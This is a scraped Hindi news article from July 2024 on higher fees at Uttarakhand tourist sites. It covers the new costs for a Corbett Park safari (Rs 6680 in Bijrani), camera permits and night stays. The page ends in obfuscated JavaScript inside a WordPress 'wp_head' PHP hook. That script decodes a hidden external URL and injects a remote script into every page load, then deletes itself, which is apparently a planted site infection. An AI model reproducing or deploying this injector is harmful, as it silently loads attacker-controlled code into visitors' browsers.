Saturday, July 13, 2024
Google search engine
Homeउत्तराखंडउत्तराखंड के पर्यटन स्थलों पर जेब करनी होगी और ढीली! अब कार्बेट...

उत्तराखंड के पर्यटन स्थलों पर जेब करनी होगी और ढीली! अब कार्बेट में चार घंटे की सफारी के लिए चुकाने होंगे 6680 रुपये

उत्तराखंड: कार्बेट के ताजा शुल्क की बात करें तो बिजरानी ढेला झिरना दुर्गादेवी गिरिजा पर्यटन जोन में डे विजिट (चार घंटे) के लिए अधिकतम छह लोगों तक पहले एक हजार रुपये का परमिट कटता था। अब यह परमिट डे विजिट के लिए प्रति व्यक्ति प्रवेश शुल्क मिलाकर छह लोगों का 3380 रुपये का हो गया। इसके अलावा आठ सौ रुपये गाइड व बिजरानी का 25 सौ रुपये अलग से देने होंगे।

उत्तराखंड शासन की ओर से कार्बेट, फाटो व सीतावनी पर्यटन स्थलों का शुल्क बढ़ाने के बाद नए शुल्क को विभाग संशोधित करने में जुट गए हैं। कार्बेट पार्क में डे सफारी, नाइट स्टे से लेकर फोटोग्राफी करने तक के लिए जेब और ढीली करनी होगी। हालांकि फाटो व सीतावनी के लिए एक परमिट पर 500 रुपये बढ़े हैं। यहां का शुल्क अब 15 सौ रुपये हो गया। कार्बेट के ताजा शुल्क की बात करें तो बिजरानी, ढेला, झिरना, दुर्गादेवी, गिरिजा पर्यटन जोन में डे विजिट (चार घंटे) के लिए अधिकतम छह लोगों तक पहले एक हजार रुपये का परमिट कटता था। अब यह परमिट डे विजिट के लिए प्रति व्यक्ति प्रवेश शुल्क मिलाकर छह लोगों का 3380 रुपये का हो गया। इसके अलावा आठ सौ रुपये गाइड व बिजरानी का 25 सौ रुपये अलग से देने होंगे। ऐसे में बिजरानी में डे सफारी करने के लिए पर्यटकों को 6680 रुपये देने होंगे। जबकि पहले 43 सौ रुपये चुकाने होते थे। इसके अलावा कार्बेट में फोटोग्राफर के लिए भी कैमरे का शुल्क बढ़ाया गया है। पहले एसएलआर कैमरा मूवी का कोई शुल्क नहीं था। अब भारतीय को एक हजार व विदेशी पर्यटक को दो हजार रुपये चुकाने होंगे। एसएलआर के लिए 300 एमएम या अधिक के लैंस के कैमरे के लिए भारतीय को 15 सौ व विदेशी को तीन हजार रुपये चुकाने होंगे। व्यवसायिक फोटोग्राफी करने के लिए अब भारतीय फोटोग्राफर के लिए दो हजार व विदेशी फोटोग्राफर के लिए चार हजार रुपये हो गया। इसके अलावा नाइट स्टे का शुल्क भी दो गुना हो गया है। ऐसे समझें डे विजिट प्रति पर्यटक शुल्क -500 छह पर्यटकों का शुल्क – 3000 रुपये आनलाइन शुल्क -50 रुपये कूड़ा प्रबंधन शुल्क -80 रुपये गाइड शुल्क -800 जिप्सी शुल्क बिजरानी-25 सौ रुपये कुल शुल्क -6680

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>